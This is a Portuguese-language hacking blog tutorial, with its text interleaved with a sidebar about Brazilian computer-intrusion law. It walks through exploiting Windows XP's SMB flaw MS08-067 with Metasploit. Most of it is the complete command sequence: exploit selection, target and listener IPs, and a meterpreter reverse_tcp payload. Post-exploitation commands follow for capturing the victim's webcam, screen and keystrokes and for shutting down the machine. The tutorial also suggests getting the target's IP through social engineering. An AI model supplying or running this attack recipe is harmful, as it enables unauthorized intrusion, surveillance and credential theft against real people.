/
/
/
/
Invadindo Windows XP [Metasploit] 27 DE ABRIL DE 2015 / S0PH0S
Pesquisar …
PESQUISAR
Como previsto na Lei 12.737/2012 no Art. 154-A invadir 154-A invadir dispositivo
Hoje traremos um tutorial voltado a pentest em sistema operacional XP, mesmo estando descontinuado pela Microsoft ainda ele é muito utilizado por bancos, sistemas
informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de
comerciais, entre outros serviços. Utilizaremos um exploit que explora a falha da porta
segurança e com o fim de obter,
smb (445) que permite uma conexão remota com a vítima. Ou seja ao conectarmos a
adulterar ou destruir dados ou
ela teremos controle total sobre o sistema dela, a qual permite interceptar dados,
informações sem autorização expressa
enviar malwares, acessar dispositivos na rede, entre outras coisas. Estaremos
ou tácita do titular do dispositivo ou
utilizando o Kali Linux como exemplo mas necessita necess ita apenas baixar e instalar o
instalar vulnerabilidades para obter
Metasploit.
vantagem ilícita. Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.
Primeiro abra o terminal e digite comando que irá abrir nossa Metasploit:
# msfconsole
Ajude o CIência Hacker
Agora setamos o nosso exploit que iremos utilizar para invasão, como citei ele explora a falha na porta SMB Ciência Hacker YouTube
6K
# use windows/smb/ms08_067_netapi
Após isso colocamos o IP de nosso alvo a qual você pode descobrir através de uma engenharia social ou ferramenta de captura de IP.
Tweets de @cienciahacker
# set RHOST 192.168.2.108
Setamos nosso PAYLOAD que fará a nossa interação com o a vítima.
Ciência Hacker
# set PAYLOAD windows/meterpreter/reverse_tcp
E o nosso IP que receberá a conexão da vítima.
# set LHOST 192.168.2.103
Por último rodamos o exploit.
# exploit
Quando inserir o ultimo comando automaticamente ele irá se conectar com a vítima, permitindo que você controle ela do jeito que quiser. Alguns comandos que podem ser usados durante a conexão com a vítima:
webcam_snap (tira a foto pela webcam) screenshot (tira print da tela da vítima) keyscan_start (inicia processo de capturar teclas digitas) keyscan_dump (mostra as teclas digitas da vítima) shutdown -s -t 1 (desliga computador da vítima) sysinfo (mostra a versão do sistema operacional e informações dela)
Nota: Esse processo pode falhar se as atualizações do sistema operacional estiverem atualizadas, ou tenha algum firewall que posso bloquear essa conexão.
Artigos, Pentest
INVADINDO EXPLOIT WINDOWS XP METASPLOIT
s0ph0s@cienciahacker:~# whoami _ "With great power comes great responsibility"
Compartilhe esse post: Facebook
Twitter
Google+
Instalando e usando o Proxychains
Testando vulnerabilidade em sites com Acunetix (Scanning)
Deixe uma resposta O seu endereço de email não será publicado Campos obrigatórios são marcados * Nome *
Email *
Site Comentário
Você pode usar estas tags e atributos de HTML:
href="" title="">
title="">
Publicar comentário